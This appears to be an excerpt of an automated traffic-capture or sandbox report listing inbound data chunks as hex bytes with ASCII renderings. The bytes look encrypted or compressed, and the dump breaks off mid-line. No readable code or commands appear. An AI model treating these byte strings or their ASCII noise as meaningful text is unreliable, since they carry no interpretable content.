2021-11-24 14:07:32 UTC	155	IN	Data Raw: f2 17 9a 43 34 72 dc 56 c5 22 1e 47 91 63 a6 e2 d4 b3 62 39 4b 92 1a f5 4c c0 b2 7e ca 20 07 29 12 59 17 3b c4 1b 75 80 91 bf cc cd 59 df 29 8b 1e 4b f9 6a 08 ba 49 78 38 86 a7 f7 26 95 92 f7 65 fc a6 cb f7 ef 6b 7a a4 6e 96 a4 e4 31 e3 5c b1 98 d1 28 78 16 16 7a cc 4f 8b 5d 89 d0 df 53 34 89 ee b1 ff 01 46 d7 f6 1f 5b 30 cd e6 ee 6a bc 65 5b ef 3f f2 83 a1 a1 7d e9 18 f6 39 50 9a 18 69 31 ca 2c a3 54 b6 fa 38 05 d7 66 a0 fe 96 8e f1 a9 8e 27 e6 e9 31 76 12 7f 4c f1 98 5c a8 6d 53 b5 5c 60 a7 9d 87 d6 72 5f 5b 1c f1 70 d9 e3 57 95 61 d7 e4 b4 1f d4 a5 bc ef 24 b3 d7 92 6c 63 3c 97 ef 2d 51 e0 b2 fa 73 eb cb af 2d 6a a6 3b dc 3b 6d 4f 19 e0 c3 69 2f 7d 93 b9 c0 86 82 c0 6c 47 7f 35 2b 14 80 02 9a 21 d9 9d 9d bb f3 f4 d7 37 d2 ab 76 66 10 de 8d 8f 3d dd c0 Data Ascii: C4rV"Gcb9KL~ )Y;uY)KjIx8&ekzn1\(xzO]S4F[0je[?}9Pi1,T8f'1vL\mS\`r_[pWa$lc<-Qs-j;;mOi/}lG5+!7vf=
2021-11-24 14:07:32 UTC	156	IN	Data Raw: 5d 7f 8e c5 8f c3 65 13 aa dd c8 69 67 7d c9 7a 22 75 0f 7f 92 ff b3 87 45 fd 74 e3 30 21 b0 1f 52 65 bc 0f 96 5b 90 37 06 20 0f a0 2c ff 9d d1 f6 47 6b 3c 37 a5 27 bd d4 86 be fd b8 1c 3a 7e 03 c8 eb c3 2a 03 b4 56 4f 22 83 87 84 0e 6b 3d 1b 92 9c 04 a9 12 30 58 70 e8 03 42 02 ec 8b aa a9 88 b7 53 35 6f ca 8f 81 6b 71 2c 2a c3 46 63 3f 40 18 0a 10 5b 55 80 e5 c5 16 2b 73 68 64 f6 45 5d 31 40 b4 30 bb d9 ca 92 bd 20 6b be 94 9d 17 84 a2 00 e5 15 c2 df 38 1e 86 9a ea 54 e1 34 4e 31 0c 2b c8 d2 bc c2 37 ef f1 c1 ac 59 d8 0c e2 f1 15 53 6d 82 7f fe 3d c0 3b d1 6c 4a db 93 ce 46 b9 39 89 7a a1 62 2a d9 ba 16 cb c9 9e 67 4a 28 c4 b6 d9 14 0d 8f 44 59 d0 28 a0 06 bd fb 0f 84 af ce 0a d8 61 5c 6c 7a 8a ab 67 d2 12 12 9c f8 9f 3c aa 1c e9 e5 9b d5 b9 c9 23 6b 02 Data Ascii: ]eig}z"uEt0!Re[7 ,Gk<7':~VO"k=0XpBS5okq,Fc?@[U+shdE]1@0 k8T4N1+7YSm=;lJF9zb*gJ(DY(a\lzg<#k
2021-11-24 14:07:32 UTC	157	IN	Data Raw: b2 dd 3b 32 85 f9 61 83 b6 9b 0d 6e 59 0f fb 6f 9c d3 ae 38 21 4c 01 4f 33 92 f7 2c 4b 42 d9 9e 67 e4 d4 5b ca 8a 56 aa 10 df e1 c0 3d 7d e3 dc 2d c2 c5 87 60 78 6e 1c 31 70 d5 3f 77 19 77 e7 64 56 4c 17 45 04 5c 82 63 c0 06 34 8f 06 c9 a3 fc 72 47 c9 38 14 c8 41 c2 21 44 e4 d9 d5 29 f0 33 bd a2 ed 73 0d c6 97 30 a7 50 f1 c2 98 01 96 93 98 11 4a a8 88 45 0c 9e 94 13 67 6f d0 7e 72 34 4f bc 92 4f 3a 71 9f 82 da 5a e9 a8 b7 b9 61 14 e2 df bb bf af ae 98 19 75 20 53 11 43 c2 ea e8 93 17 2d 65 62 dd a4 1a 03 38 88 68 db 90 ea 1d af 90 e8 4c 30 37 c7 ba a8 db 51 6e 6f e4 1c b5 85 11 e7 f2 f3 94 7d bb 41 aa ee 9e eb fb aa 25 7a 8a b0 ce 4a cd 8f d2 77 96 63 35 97 f6 00 0d e1 66 81 b2 44 f2 be 35 95 64 c2 e4 65 0c 24 5b 2e a4 0a 09 2e 77 a0 d9 05 79 40 49 a0 50 Data Ascii: ;2anYo8!LO3,KBg[V=}-`xn1p?wwdVLE\c4rG8A!D)3s0PJEgo~r4OO:qZau SC-eb8hL07Qno}A%zJwc5fD5de$[..wy@IP
2021-11-24 14:07:32 UTC	159	IN	Data Raw: f2 d4 94 77 0a c1 d0 90 a9 d1 50 f6 54 34 33 a3 2e 18 2d aa db 02 84 41 b0 27 d6 3f 9b f1 40 50 aa 70 7a 25 db 2b f5 72 75 cf 52 8c 59 df d9 fb c3 9a 7b 78 af 29 6b 7c cf c2 2f 04 ef 4d 46 05 1a 4b 0c c2 c0 25 9a d1 1f 2d 2b a2 a0 34 06 aa 5f 0f ed e5 dd 42 41 ca f2 bb 97 2c 10 70 ea 20 79 17 09 3b 9e 09 28 fa 49 76 fd bc 0d c5 3c 9a 37 86 f4 85 35 8c dc d8 69 bf 75 21 5b 3c f4 17 b8 c3 39 44 17 a6 9b a2 ae 5a 57 04 8f 83 87 24 42 00 94 bf 3a 3c 8c 4e 10 20 ac cf da 8c a8 f1 76 f0 6c a2 e7 0e 02 fc ba 1a 4b cb dc 9d 59 c5 8e d5 cc 82 12 61 fe 75 2a 56 b2 01 7d 41 61 65 3d 7f 34 68 fa 25 54 0e 9e a6 b6 0b 37 35 8e 1a 94 5a 7c ef 79 d7 d4 2c 64 b8 9b 39 20 cd 67 16 54 e4 2c 6f ea c0 c5 17 c2 55 8c cb 06 0a d4 93 8f 8c 3f 16 07 dc 6a 50 06 bf 26 e2 cd cd 3d Data Ascii: wPT43.-A'?@Ppz%+ruRY{x)k\|/MFK%-+4_BA,p y;(Iv<75iu![<9DZW$B:<N vlKYau*V}Aae=4h%T75Z\|y,d9 gT,oU?jP&=
2021-11-24 14:07:32 UTC	160	IN	Data Raw: ff e6 60 dc a1 0e 4e de 17 d4 5b c2 6f ac 06 e2 e8 f2 c2 33 f6 24 d2 e9 dc a1 96 11 c9 fa e0 95 00 ab 69 8e c6 dc 43 fd 8b cf 7e 68 0a 48 41 8b 20 a8 0b 51 70 7a 04 d2 ef b1 5f 5e a8 72 73 92 08 db 83 b5 2a 3d 5e 4e e0 b5 48 88 68 55 6b 49 04 87 a9 7c 02 62 8c 1d 7a d6 c4 0c d9 76 c2 c8 09 fa 43 bc 87 fe 44 0d 1c fe d2 08 c3 5b 72 11 bf 8a 6a 51 1b 8c 9d 71 14 b5 b2 0f a5 b6 d9 47 5f 26 e4 c6 86 03 e1 f2 49 a2 d0 a6 f2 3a ca 9a c1 a0 0e ae c5 57 79 43 49 18 6b d4 97 da 84 6e 4c ab 27 9c 76 30 04 00 01 de 4a 0a 1f 13 8e 1d 79 a3 6f 94 67 23 a7 74 2e 65 1c 13 5f b1 0a fc bd 22 9b 45 72 a3 21 10 68 d4 26 2c 90 d1 40 5c 48 be f7 dc 9e 33 00 a9 6e 77 61 68 1d 19 90 ae ff df 6f 87 c1 de a6 91 c5 70 a7 92 29 77 58 f6 22 cb fa c3 19 34 87 28 e0 60 b4 90 14 06 3b Data Ascii: `N[o3$iC~hHA Qpz_^rs*=^NHhUkI\|bzvCD[rjQqG_&I:WyCIknL'v0Jyog#t.e_"Er!h&,@\H3nwahop)wX"4(`;
2021-11-24 14:07:32 UTC	161	IN	Data Raw: d9 62 c6 bb 5f ce ed 6c 03 a6 ce f5 7d 31 8c 3a e5 b0 45 c5 a2 1f cf 98 59 bc d2 a6 b6 35 3e a7 79 fa b6 f6 03 8c cb 46 9f 56 3e 58 4a 31 e3 f3 39 a2 18 32 3f 20 6b ae 57 f2 62 85 97 d6 a7 9d 25 55 a8 27 53 1b 56 ba dc 1a 9a 41 7e 3f 0f 24 10 d3 84 1d 50 f3 18 4b 20 26 38 16 ba 2f 25 47 6f b9 0a 2e 9a 02 a0 c1 80 98 2c eb a4 e7 5a 7b f5 d1 9f 02 ff cc f4 fd b4 e8 88 d2 91 b3 b5 ad ea 87 ee 7c eb 32 db fd f8 e1 37 c5 04 41 29 fd 78 a9 45 a3 39 fc 2d 15 87 db 30 b8 8f ea 9a 3e b7 90 3f 73 34 36 8c d2 89 00 6d f9 00 72 0c 4e 74 35 c5 de 93 67 bf 13 0b 20 05 8c 5f ea dd 1d 5d 9f 4f f7 f8 7b 38 0d 7a 65 41 f4 64 c0 d7 8f 55 fb 33 79 dc a5 5e 41 d7 e2 2e 98 d5 a5 79 3d b0 01 7a 36 87 3c 2f 88 82 f8 6c e2 cc a9 35 bd 47 d8 8f de c1 0b 74 0c 41 41 a2 c3 8d 00 3f Data Ascii: b_l}1:EY5>yFV>XJ192? kWb%U'SVA~?$PK &8/%Go.,Z{\|27A)xE9-0>?s46mrNt5g _]O{8zeAdU3y^A.y=z6</l5GtAA?
2021-11-24 14:07:32 UTC	162	IN	Data Raw: b5 79 b4 30 8c 16 f4 f3 d5 68 2c 6e f7 ba f6 d6 fd f8 97 be ea b4 d1 57 08 7c b3 65 8c 28 00 66 6e 4e 41 dc cb eb 81 f0 32 d9 82 a2 e5 28 64 dd ec 4a 2b 76 f3 28 9b e9 80 44 a7 34 04 7b 58 0c 56 ad 76 c8 fd 49 79 43 a3 8b ae f3 04 42 51 d3 cb 76 eb 4b 72 9c 50 e5 c1 d0 37 69 56 53 b2 af 8a 25 2e 73 71 e8 12 4b b2 cc ea 51 6a e2 3e f7 7c e7 a3 f4 5c 44 3b 89 b2 a0 e7 bd 43 b0 97 e2 cd f3 d8 dc 87 84 9f e2 38 60 34 77 c0 17 47 49 25 4c 61 f6 76 57 cd 7b a1 29 50 5a 44 5e 0a d3 eb 2e f7 81 f2 84 af b9 44 df 50 a2 36 fc 8e 53 2b 4c 51 b6 a9 75 27 ad 4d 84 d4 2d 2f 45 d5 a4 5c aa 85 57 e1 b5 9b 8a 04 91 8a a0 42 82 c8 07 a6 ac 00 fe 89 df 36 3c 20 a7 15 7d 62 66 ca 71 8d f7 3d 43 f8 a6 36 8f 85 ca cf ad d0 5d c3 5a b2 7d 0d 8b 99 1e bc cd a4 5e 61 72 0d 60 8e Data Ascii: y0h,nW\|e(fnNA2(dJ+v(D4{XVvIyCBQvKrP7iVS%.sqKQj>\|\D;C8`4wGI%LavW{)PZD^.DP6S+LQu'M-/E\WB6< }bfq=C6]Z}^ar`
2021-11-24 14:07:32 UTC	163	IN	Data Raw: 2c 3b fe 3e ab 3b a5 2c a0 63 c8 4e 6e ca 13 37 21 47 30 70 45 d9 8e 83 20 9e 10 93 98 a4 7b fc 03 0b 2c f0 0d e3 a0 dc 5f ec 9e db 65 66 13 eb 43 54 4e ae 49 a7 ab 51 8d 73 c9 69 88 42 64 d4 b1 be ea 12 38 72 23 f2 89 d1 8a 09 1d ed e2 98 65 1b 88 09 c3 43 b1 27 80 29 5b e5 02 bc f0 d8 d0 44 6a 48 6f 24 2f dc 1d 46 8b 8c 83 70 67 de f6 ac b2 7b da c7 2e b8 5e ee b3 ed 73 87 22 ef 33 5c 3f f2 af 21 92 90 06 66 af ca 63 f9 39 d9 5e 8c b3 18 f7 f7 c0 7b 54 76 10 32 4c 56 57 75 5d d6 24 ff 13 d7 15 52 f3 60 0c 16 48 d4 fa 2f 10 19 da bd 81 d3 10 14 44 57 4a 34 b3 79 80 ef 70 3c f8 f1 e1 7c d1 90 f5 f1 45 3e 81 b1 7b 9e ef d5 50 3c 86 2f 69 6f a1 89 8c b0 79 ed f4 ee b3 8c be c4 45 01 aa f6 ac d0 f2 c8 90 23 a8 f3 23 f7 a4 3d 05 c8 00 dd da 8e 42 aa ea e5 e5 Data Ascii: ,;>;,cNn7!G0pE {,_efCTNIQsiBd8r#eC')[DjHo$/Fpg{.^s"3\?!fc9^{Tv2LVWu]$R`H/DWJ4yp<\|E>{P</ioyE##=B
2021-11-24 14:07:32 UTC	164	IN	Data Raw: 50 8d 55 0e 71 da af 3b f1 e0 b4 a4 db 73 f7 a2 43 8d f1 a4 75 73 f8 95 a6 03 0e 96 db 7c 32 7c 3d 8c 5e 36 40 b6 ba a3 9f 69 a1 63 0c 1f f5 78 71 a7 a4 27 58 dc cc f4 61 54 fd c8 7d a7 bf b5 57 be 2a 41 21 4e 99 76 52 6c 4b d9 7b c8 a6 05 d5 62 50 23 ae 27 f7 ac 0f dc fb 8d 81 e5 36 98 d8 12 26 f0 ff ea 3d 9e 5b d5 17 fb 73 83 2c 74 72 85 cc 5b 7f f5 3a df 73 a4 8f 9e 06 23 04 bf df 9a 36 c4 8b 77 91 fb 17 47 eb a1 43 bf c6 b5 c2 02 3e 21 02 14 59 94 4c 17 eb 94 45 9b 19 3e 4e 91 a6 7f d8 b8 0d 8a d0 49 18 8d 9e 4f 71 c5 72 01 42 9f a1 35 ef 0b fe 29 d3 3a 3d 4f 58 18 c5 42 e8 bf d9 9b 2a 96 a6 a1 a8 7c f0 22 f3 e4 6b 28 98 e1 3b d3 58 64 6b b9 f3 ff ab 56 48 68 33 a3 11 fe d5 bc ed 80 29 21 e3 e2 87 53 6a fd 5f 1b 0a b8 9f a6 6e e8 74 22 17 2b 81 8a 77 Data Ascii: PUq;sCus\|2\|=^6@icxq'XaT}WA!NvRlK{bP#'6&=[s,tr[:s#6wGC>!YLE>NIOqrB5):=OXB\|"k(;XdkVHh3)!Sj_nt"+w
2021-11-24 14:07:32 UTC	166	IN	Data Raw: 9f 80 0b 4d 60 8b 7e 95 7b 18 3f 15 47 bd e9 a4 98 8b 7c a3 05 52 6f 52 59 bd 0a c1 ec 98 91 a8 8f 93 b3 e2 41 89 51 80 7f 3d 1d af 35 16 fe 8c 77 07 6e aa c4 99 ba e4 a1 1c a3 4f d9 32 81 43 8a 8e 0f 43 04 95 1d fb 94 a7 57 8f d2 ef 91 65 49 41 cc 99 a7 31 48 4f 3d bc e6 4b 76 24 7e 35 89 54 f6 bc 82 31 0c 25 b6 63 03 23 4f 41 46 b2 6f f6 bf 35 75 7b f0 8f df 42 07 76 b9 e3 53 40 40 e7 b0 b0 82 33 59 48 0d 8f dc bf b8 40 fd 78 72 1a 1d 54 31 5f 89 86 ec 72 a4 0c 20 be 4a 4b 4a 91 20 97 7b 59 83 ac 2a 0a 54 76 aa df 70 ed 3b 57 b1 62 ad 5a 7c 39 ec 05 9d 2a cb 1f ce 43 5f 34 ef f1 57 c4 53 ec 98 73 cb f3 5f df 40 54 c9 f4 0d 64 c6 d2 01 b8 88 23 3b c3 b7 fd df 81 43 de 10 56 fa 89 48 42 38 99 43 c8 3d 76 e5 b4 a4 ce ac ed 7e 44 2a 4e 20 1d 81 29 19 96 6c Data Ascii: M`~{?G\|RoRYAQ=5wnO2CCWeIA1HO=Kv$~5T1%c#OAFo5u{BvS@@3YH@xrT1_r JKJ {YTvp;WbZ\|9C_4WSs_@Td#;CVHB8C=v~D*N )l
2021-11-24 14:07:32 UTC	167	IN	Data Raw: d0 28 75 cc 83 93 b8 71 42 97 bf 51 80 8f 93 21 8f ce 43 2b 0b a2 77 76 3d e5 8d d3 11 6c 75 19 2b 81 d6 fa bd 65 b3 f0 c8 42 5c e7 5a 7b 16 9c 3c ac 12 79 2e fa 42 b4 bc 6c 38 6f 35 a7 71 23 d9 df 50 88 f0 e3 97 e4 b8 23 73 52 57 ba 15 f3 e3 cc 55 e2 6a f9 74 d5 0b ff 39 db bb ea 2e a5 df 1f bc 2a ee 79 24 11 a7 1b 00 7b c9 5a f2 5f bb cb b4 03 03 52 ce 2a a2 81 3f 5e 21 e1 48 49 19 f5 3b 54 06 54 6c c9 03 9c db d1 14 dd e3 62 fc 51 a8 f3 cd 0d 56 a2 dd 81 78 f6 d4 fd 2a 91 83 80 0c 09 69 20 b6 69 7b 88 a9 c4 44 a9 a2 4f 9d 6d 20 7d f7 9d 1e 16 a8 b1 3b 59 62 7a 17 51 99 05 b9 3c c8 d3 4a bc 14 9e 1b ad b4 13 f6 17 3d 9f f7 c1 35 46 43 d9 8b e5 6a 17 17 f9 c3 35 3d 67 87 e5 b1 41 d0 a5 9c da 3f 90 f3 0f 26 d1 81 63 86 14 cc 62 b8 dc f7 d7 6c 6a 85 db 76 Data Ascii: (uqBQ!C+wv=lu+eB\Z{<y.Bl8o5q#P#sRWUjt9.y${Z_R?^!HI;TTlbQVx*i i{DOm };YbzQ<J=5FCj5=gA?&cbljv
2021-11-24 14:07:32 UTC	168	IN	Data Raw: a6 e2 38 fe 42 ef 6c 80 40 4e 30 78 d9 25 b5 9f 5c da c0 22 23 44 bd b6 43 f6 9e bf ef 30 1c 32 ce e5 67 4c e4 db 37 f2 91 6c ab 90 80 3f 03 da 6c 76 dc f8 f9 83 63 ec 19 7c b9 e0 93 63 a6 f6 87 15 03 03 dd 3b d1 a0 8a 29 ca 43 57 77 41 f1 02 88 0b dd 43 a9 46 ef 2a 8e 97 92 ac cc 54 cd 8d 5e ed 94 ff 5d d2 4e 31 5a 61 3b a2 ea fa 5b 08 9a 43 fb 70 e2 a4 6b fd 38 8e 99 39 bd 0d 59 0e d2 cf 2a 9e 72 6f c8 31 80 d7 51 1b 55 1b f8 2c a7 ac e7 47 d8 24 a1 e6 31 a0 09 68 57 8b 94 8e ac 0b 14 ee 8e 9a 04 a7 9a 7f 5e a6 fd 57 ed d3 e4 26 17 b2 8d 7a 35 34 98 65 82 b9 c9 af 9a d6 72 bd 6c d7 1c 51 e5 17 f8 b8 6a 49 5f 4c 2a 01 b0 fe 9e 72 89 a7 de f1 a8 6a 46 36 b5 d9 96 f8 7f 67 0e 25 15 25 7a d7 13 4e 6b b4 75 ae ef 70 cd ef e3 73 7e 81 65 00 9d 07 32 0f a8 75 Data Ascii: 8Bl@N0x%\"#DC02gL7l?lvc\|c;)CWwACFT^]N1Za;[Cpk89Yro1QU,G$1hW^W&z54erlQjI_L*rjF6g%%zNkups~e2u
2021-11-24 14:07:32 UTC	170	IN	Data Raw: 12 b9 af 13 ad ae f5 e5 d1 ce fa a2 e0 df 16 10 b1 01 36 48 d3 f2 54 fa 16 c1 6f 9c 23 16 a1 0c aa 62 8d bb 77 52 a3 96 b2 16 0a 3a 3d 06 41 3e cc 2d 1d 5e 13 12 f7 83 42 89 d6 17 82 21 b5 ca fb 61 6e 9e a2 84 2d 1a 2d 17 51 3d bd 7a e7 da 78 e1 aa ea 22 25 7d e2 7e a5 44 6b ae 00 0a 34 8a 3a 31 a5 fa 7b 9a 53 f1 1e a9 c7 e1 74 20 e6 59 32 0c 1d 9d 76 8a da 18 a6 34 39 a4 8c fb ee 37 7e a1 cd 12 38 3a 99 d6 f0 69 93 5e f4 07 9a 13 01 25 d7 2e 2a aa 48 4d 64 4a f9 63 5f 76 6b 86 8a bd d5 0c 60 fc aa 05 9a 37 b0 c7 f1 c5 b8 aa a5 51 9c 08 54 ba 33 db dd c3 12 9a 66 51 a2 7d 2e 65 c3 c2 20 c1 40 b8 9c cd 51 4d c2 b0 b9 b5 a0 d2 dd d4 82 c7 ca d5 83 8a 48 77 85 a8 26 7c d9 28 f9 ad 47 54 e9 a7 c8 22 dd 7b a5 53 52 7f 9e 55 bc 3d a0 1f 18 2a d9 c5 56 fd ba b8 Data Ascii: 6HTo#bwR:=A>-^B!an--Q=zx"%}~Dk4:1{St Y2v497~8:i^%.HMdJc_vk`7QT3fQ}.e @QMHw&\|(GT"{SRU=V
2021-11-24 14:07:32 UTC	171	IN	Data Raw: 7e f9 87 f2 f1 33 14 9b 05 e2 03 97 1a 79 8b 47 ee c5 39 3b 4d 4b 68 3c 51 4f f0 f6 64 ac 3a 65 79 fb 37 86 23 4e 5a 4b d8 83 a6 0a 0d b2 dc fe e0 49 df 02 c6 86 a4 a0 2f df ee 87 31 aa d4 ad 8d 12 24 95 a9 08 a8 51 74 22 c0 3b 5a 4a 5d 7c b3 de ab e6 dd e2 dc b9 e3 d3 7b ca 1b 1c 91 bd 66 60 b7 c3 68 dd 62 59 3f 91 59 cc 14 27 f7 89 c5 86 a4 75 25 98 ae b7 b8 7a ef a0 ef 2d 37 36 27 9a 5b 3b f7 ed de fc 8f 24 ea 33 20 b2 c1 1c fe 38 58 d2 99 d7 19 ee 69 a0 5f a5 24 b5 24 22 20 99 6e 25 b1 33 8c 1f 70 76 dc d2 d5 36 19 f6 8a 1b d1 67 fb 01 70 05 eb e9 6f a9 27 59 0f 1f db a7 77 94 c1 50 3e fe d8 23 6e 8b ba 96 b3 d6 57 be a7 d6 42 60 ec b6 68 1b 0a 03 5c bd 3c c4 08 3e c7 b8 8b 0f 94 19 93 03 88 e5 9d a8 59 a3 fc 62 64 86 1d 69 60 ab cf 8c 46 b5 91 84 64 Data Ascii: ~3yG9;MKh<QOd:ey7#NZKI/1$Qt";ZJ]\|{f`hbY?Y'u%z-76'[;$3 8Xi_$$" n%3pv6gpo'YwP>#nWB`h\<>Ybdi`Fd
2021-11-24 14:07:32 UTC	172	IN	Data Raw: 9b 92 2c a9 e0 f0 78 cf 9c 56 32 71 41 11 41 71 b0 78 8b 11 74 cd 34 36 4b aa b9 a9 16 c4 44 3d 6b 10 7c a2 27 9c ec 25 79 5e a0 f2 8e 42 13 71 ca 36 02 e7 46 8a c5 d7 44 2a 5d f4 74 93 00 5d 39 18 6b 22 77 f3 88 66 17 ea 93 8b 2a 4e cb f0 7e 14 9b c2 84 c0 35 8e 0a 42 c0 3e 41 4d 29 5a 5d eb cf c8 4a 4d 8a 55 89 12 b3 0c 0c fc 6b e9 87 7e 7e a8 7f fd 4f fa 64 51 18 18 6e f2 d0 46 31 1f cf cc e8 54 76 95 c8 31 e1 9e 46 07 7c db df 04 b7 0f 22 b8 5a 59 28 e2 4d d9 44 88 11 98 2b b8 b3 4b 13 2a 35 6c da a1 f4 44 df 1f 57 7e 5c f3 ac fe 84 bd a5 9f 63 96 b2 39 74 f2 6b 98 e7 83 24 2e 2e e4 cd 37 70 3c 86 d9 8d 34 48 49 5e 06 70 a5 53 ad 28 e3 6a d5 6f 86 af 5c 54 08 6e 92 bb 38 ac 56 84 95 c8 35 d3 80 d3 27 bc 36 ff f2 e5 ce c8 ed 0e 19 0e b1 9b 30 92 82 cc Data Ascii: ,xV2qAAqxt46KD=k\|'%y^Bq6FD]t]9k"wfN~5B>AM)Z]JMUk~~OdQnF1Tv1F\|"ZY(MD+K*5lDW~\c9tk$..7p<4HI^pS(jo\Tn8V5'60
2021-11-24 14:07:32 UTC	173	IN	Data Raw: c1 72 b8 0d 24 28 c0 dc 9f f9 5d 60 87 58 38 a4 e3 c9 46 aa 24 2b b8 10 ab 5a 30 d9 ce a1 19 18 22 a8 72 98 a6 7a 23 29 8d 60 78 e2 64 f8 08 85 20 51 a4 cb 08 47 97 41 2d f7 ad 23 0e 95 28 50 5e 4e 63 66 36 77 4f df 3d bb 0b 68 c1 d2 57 be a6 e2 98 4a 77 78 7c 6a ab bc 87 e4 b9 87 4a e0 4a 28 ea bc 63 f4 e3 f3 54 2c eb 3e 13 08 a4 16 fa 2e b1 a7 c8 d4 9e 2b a9 32 7e ef 15 e4 5a 6b b7 d3 a9 7c e3 ad 3c 3e 25 24 10 03 c9 38 13 db e1 09 07 fd 1f e6 13 d7 45 0e 07 b4 03 2b 67 b0 b5 72 4e 38 60 e3 a7 f7 71 0d 67 39 48 0a 6b 2b b6 b5 6d fe 18 d2 0b 7e 22 5e a2 c3 c3 e9 52 d7 fb 18 29 d1 ef 4c d5 f6 b5 37 db e6 f8 d6 90 99 83 b6 24 78 1c c5 88 91 a4 17 9f 2f 29 3e 65 91 c6 9c c3 1f 97 e6 f3 28 85 b9 46 91 20 2c bc 7b 84 67 93 62 d9 29 c8 3d ff 84 29 c5 55 19 b6 Data Ascii: r$(]`X8F$+Z0"rz#)`xd QGA-#(P^Ncf6wO=hWJwx\|jJJ(cT,>.+2~Zk\|<>%$8E+grN8`qg9Hk+m~"^R)L7$x/)>e(F ,{gb)=)U
2021-11-24 14:07:32 UTC	175	IN	Data Raw: dc 06 4b 05 5a 51 5a 5b cb 8a ba 31 1c a1 4e b4 d0 3c 45 90 b9 ea be 9f 26 bb fc 7e ad 93 38 27 51 de 35 f2 2b c5 38 12 34 8b f3 d1 bc bc 75 33 30 ea e2 92 01 3b c2 a3 e6 6e 15 48 49 c7 a4 3e 9b 8e 6a 4c 14 6e cf 12 94 89 13 93 30 e5 ea 7c 78 ef 84 75 a1 1b 8f c9 28 0b e6 90 3f a8 b8 53 7a 16 01 ca 8a 17 42 81 7f 0b df 69 9f a1 70 fd bd a0 58 5c 9a 2e 67 0c 33 f7 d1 15 00 52 f7 4a 15 6e 0b 1d 71 70 d9 52 ea ad 7b f3 b8 e4 6e 6d 8f 9f 5c 52 e3 73 1f 4d fb 3c f0 a0 04 cf 7c d5 63 04 b2 5a 9b 3f 82 61 9b 02 ec 8b 3b a2 3f d0 a6 8a 37 f8 6a 14 0a 3d b4 3d c0 05 35 5e 96 98 e3 b0 0c ec 52 3d f1 fb 4c af 7e 58 9d 77 18 47 30 39 af 62 b5 d0 b9 1e 89 f8 1d 77 f6 d2 c4 3b 4a 65 17 68 37 6a b7 94 d8 ee da 6e fc 50 df 21 81 c2 f4 59 a3 8b 8b 4b 65 0f 1e 71 25 00 05 Data Ascii: KZQZ[1N<E&~8'Q5+84u30;nHI>jLn0\|xu(?SzBipX\.g3RJnqpR{nm\RsM<\|cZ?a;?7j==5^R=L~XwG09bw;Jeh7jnP!YKeq%
2021-11-24 14:07:32 UTC	176	IN	Data Raw: 62 eb e9 6b 4a 78 13 81 01 85 8b 13 66 7e e7 28 a1 84 0d 83 5c 42 6a ad 4b d1 45 a0 ec 9e 99 ca 4b 45 06 04 92 03 4a f3 49 1c 48 02 e1 ba d5 62 43 89 23 95 76 7c 9a f6 06 c6 9d 4f 7c 26 1e 18 e4 7d 91 00 fe 07 5b c8 36 38 54 2e 43 d2 19 e3 cd 52 55 ad e0 39 d0 0e 82 0e 69 60 1b b5 b5 2c 25 f0 9c f6 43 54 4d a7 c5 bb fa 4b 50 4b 32 88 41 b7 ee ba 36 72 c2 2d 3e 74 94 c0 2e 05 35 63 b1 bd 93 5d 94 cb 05 03 3a f4 fd 24 17 d1 0a b2 2d 9a b0 75 e1 8f 0a 11 5a d1 87 8e 1b 33 e1 2e a4 f4 86 a5 6e e9 25 17 52 a5 57 2d a2 f6 58 11 79 bf 0b de f1 25 68 a2 94 42 1c 1b 83 3f bd 22 9b 99 55 86 6b f0 0f a7 c4 f8 4a 1e 85 f6 fe 8a 39 78 40 35 e3 2a 9b 85 1c 92 5f 1d f6 f2 c7 5e 4d 71 9e a0 6f 7e 95 11 3b cb d4 e8 3c 27 11 99 59 a2 b4 1d d5 86 06 3c f9 2f 2a b5 45 34 9a Data Ascii: bkJxf~(\BjKEKEJIHbC#v\|O\|&}[68T.CRU9i`,%CTMKPK2A6r->t.5c]:$-uZ3.n%RW-Xy%hB?"UkJ9x@5_^Mqo~;<'Y</E4
2021-11-24 14:07:32 UTC	177	IN	Data Raw: d1 d8 e3 25 db 47 61 9d ac 68 3f 62 22 93 26 1e 06 8d 60 dd 68 f7 a6 1e 50 f2 e5 81 81 03 e7 56 7f 78 cc e8 e7 25 e8 cf 83 15 f7 0e 25 11 60 62 60 24 03 fb 93 26 1b 73 13 a0 6c cf e1 86 48 87 8b ea cf e2 ae 46 f3 37 b4 52 79 1c 4a 2f 49 e8 57 28 02 58 3b 34 c3 ea d0 17 b0 43 fc 88 c3 e7 46 a5 e9 42 e5 4b 01 fa a5 b2 48 16 e6 cc 7d b9 68 55 3c 53 a1 40 67 67 d3 8c 3a 8e 41 23 e6 d9 85 90 d6 c8 6c 58 74 77 69 6f 14 7e 6b 6c ef 24 21 f8 48 cd 18 f0 80 c6 af eb 94 26 24 23 86 70 e6 2f 39 e2 94 8b 60 f5 54 33 0e 93 99 ee 0c 75 7d 5e de de 5c d9 76 fb e3 0f 56 f3 80 03 b8 c2 33 00 d3 4a bc 94 2f 4c 4a 67 42 19 7c d4 24 ea 94 7f b5 92 bb 40 cd b1 ae d0 f2 67 23 d2 02 2c 4d 83 fd fd 1a fc b7 4e 7e 6f 86 52 c2 7d 54 45 60 d2 ba e8 c5 17 3e 68 96 46 42 c6 5a e2 0c Data Ascii: %Gah?b"&`hPVx%%`b`$&slHF7RyJ/IW(X;4CFBKH}hU<S@gg:A#lXtwio~kl$!H&$#p/9`T3u}^\vV3J/LJgB\|$@g#,MN~oR}TE`>hFBZ
2021-11-24 14:07:32 UTC	178	IN	Data Raw: f8 b5 eb ec b8 6e ed 03 e0 a6 de 2a a3 8d 57 c0 d7 63 bd a5 45 58 e1 bd 74 05 a6 26 27 9e d1 82 57 37 62 36 b9 09 9d 6b 5b df d0 d5 76 06 b7 1c b7 4b 9a 36 f8 e8 9f ed 98 2c 47 56 48 ca cd 56 cb 05 d8 7b 69 e8 42 fc d2 0d e4 47 32 3f 86 86 f2 c4 cf dc dd 0a bd 72 0a 3f 08 15 5e c3 52 0a c9 44 33 d3 63 36 1c e1 5f 3b d5 a9 61 e4 59 fb c3 37 bc d3 89 a8 c6 10 4e f5 8f 7f ac b6 fa 8d fb b6 ae 11 51 7a 2c cb 45 21 f7 75 f3 d7 27 e4 05 e6 ee 95 10 c0 e5 55 05 84 20 33 88 4f a3 e8 85 79 97 59 a4 82 11 80 be ec 56 28 a8 8f 8f 49 78 8f 77 14 de d7 ec 69 c8 28 61 fc f2 2c fa d3 d4 d7 89 b3 65 f1 76 e0 6a 02 00 b9 cf 8a eb 09 20 35 70 37 2b c4 8c 65 7b 6f 13 10 5d 97 c8 6d 00 04 40 dd 47 6c df ac 62 16 e0 9b 1a c9 dd 